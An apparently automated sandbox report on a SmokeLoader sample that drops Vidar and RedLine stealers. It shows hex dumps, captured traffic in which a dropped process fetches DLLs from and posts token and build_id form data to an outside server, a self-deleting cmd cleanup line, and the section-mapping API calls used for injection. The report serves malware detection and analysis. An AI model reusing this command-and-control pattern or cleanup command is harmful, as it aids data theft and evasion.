                                                          2024-05-26 22:28:23 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                          Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                          2024-05-26 22:28:23 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                          Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49764 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:25 UTC | 174 | OUT | GET /softokn3.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
2024-05-26 22:28:26 UTC | 246 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:25 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 257872
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-3ef50"
                                                          Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49765 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:27 UTC | 178 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
2024-05-26 22:28:27 UTC | 245 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:27 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 80880
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-13bf0"
                                                          Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49766 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:29 UTC | 279 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAF
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 1145
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
2024-05-26 22:28:29 UTC | 1145 | OUT | Data Ascii:
------DAKEHIJJKEGIDHIEHDAF
Content-Disposition: form-data; name="token"

d23fa85603b96f65cdddf908b543ef9a
------DAKEHIJJKEGIDHIEHDAF
Content-Disposition: form-data; name="build_id"

42d0618304a88d6476bc55d33c23d7e6
------DAKEHIJJKEGIDHIEHDAF
Cont
2024-05-26 22:28:30 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
2024-05-26 22:28:30 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49767 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:30 UTC | 278 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
2024-05-26 22:28:30 UTC | 331 | OUT | Data Ascii:
------IEHIIIJDAAAAAAKECBFB
Content-Disposition: form-data; name="token"

d23fa85603b96f65cdddf908b543ef9a
------IEHIIIJDAAAAAAKECBFB
Content-Disposition: form-data; name="build_id"

42d0618304a88d6476bc55d33c23d7e6
------IEHIIIJDAAAAAAKECBFB
Cont
2024-05-26 22:28:31 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49768 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:32 UTC | 278 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
2024-05-26 22:28:32 UTC | 331 | OUT | Data Ascii:
------IEBAAFCAFCBKFHJJJKKF
Content-Disposition: form-data; name="token"

d23fa85603b96f65cdddf908b543ef9a
------IEBAAFCAFCBKFHJJJKKF
Content-Disposition: form-data; name="build_id"

42d0618304a88d6476bc55d33c23d7e6
------IEBAAFCAFCBKFHJJJKKF
Cont
                                                          2024-05-26 22:28:33 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.5 | 49769 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:34 UTC | 278 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAE
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:34 UTC | 331 | OUT | Data Ascii: ------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HDBKFHIJKJKECAAAECAECont
                                                          2024-05-26 22:28:35 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.5 | 49770 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:36 UTC | 278 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 453
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:36 UTC | 453 | OUT | Data Ascii: ------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KECFIDGCBFBAKEBFBKFBCont
                                                          2024-05-26 22:28:37 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:37 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.5 | 49771 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:38 UTC | 281 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 112837
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:38 UTC | 16355 | OUT | Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------DGDAEHCBGIIJJJJKKKEHCont
                                                          2024-05-26 22:28:39 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:39 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.5 | 49772 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:40 UTC | 278 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFI
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:40 UTC | 331 | OUT | Data Ascii: ------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------FCBAEHCAEGDHJKFHJKFICont
                                                          2024-05-26 22:28:41 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Target ID:0
                                                          Start time:18:26:48
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe"
                                                          Imagebase:0x400000
                                                          File size:41'369 bytes
                                                          MD5 hash:A93525F5F13C811E90C56492F5AC934A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:18:26:53
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff674740000
                                                          File size:5'141'208 bytes
                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:4
                                                          Start time:18:27:13
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Roaming\aarhevh
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\aarhevh
                                                          Imagebase:0x400000
                                                          File size:41'369 bytes
                                                          MD5 hash:A93525F5F13C811E90C56492F5AC934A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 55%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:18:27:20
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Imagebase:0x400000
                                                          File size:325'120 bytes
                                                          MD5 hash:EA9DD1EAE2E521666D3F06382104EC10
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 92%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:18:27:41
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
                                                          Imagebase:0x7e0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:18:27:53
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\C9A7.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\C9A7.exe
                                                          Imagebase:0x400000
                                                          File size:2'144'768 bytes
                                                          MD5 hash:5DEB4442AE617600891949163BB52F0A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:Borland Delphi
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:18:27:53
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Imagebase:0x400000
                                                          File size:881'664 bytes
                                                          MD5 hash:66064DBDB70A5EB15EBF3BF65ABA254B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 4%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:18:28:42
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
                                                          Imagebase:0x790000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:18:28:42
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:18:28:42
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 10
                                                          Imagebase:0x900000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:18:30:02
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Roaming\aarhevh
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\aarhevh
                                                          Imagebase:0x400000
                                                          File size:41'369 bytes
                                                          MD5 hash:A93525F5F13C811E90C56492F5AC934A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false


                                                            Execution Graph

                                                            Execution Coverage:7%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:53.7%
                                                            Total number of Nodes:67
                                                            Total number of Limit Nodes:3

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                            • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                            • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                            • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65

                                                            Control-flow Graph

                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                            • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                            • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                            • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65

                                                            Control-flow Graph

                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                            • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                            • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                            • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24

                                                            Control-flow Graph

                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
